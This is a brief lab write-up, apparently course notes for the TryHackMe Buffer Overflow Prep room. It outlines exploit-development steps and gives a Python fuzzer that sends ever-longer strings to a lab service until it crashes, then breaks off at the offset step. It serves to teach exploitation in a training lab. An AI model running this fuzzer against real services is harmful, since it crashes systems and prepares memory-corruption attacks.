Buffer OverFlow Challange

I Will use lab in THM Buffer Overflow Prep

STEPS

  • Fuzzing

  • Finding Offset

  • Finding Bad Characters

  • Finding Vulnerable Modules

  • Shellcode generation

  • Exploitation

FUZZING

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.X.X"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

python3 fuzzer.py crached in 2000

Crash Replication & Controlling EIP

in msfconsole

2000 Byte

Get number of OFFSET

PreviousModule 11 (Widows Buffer OverFlow)NextModule 12 (Linux Buffer OverFlows)

Last updated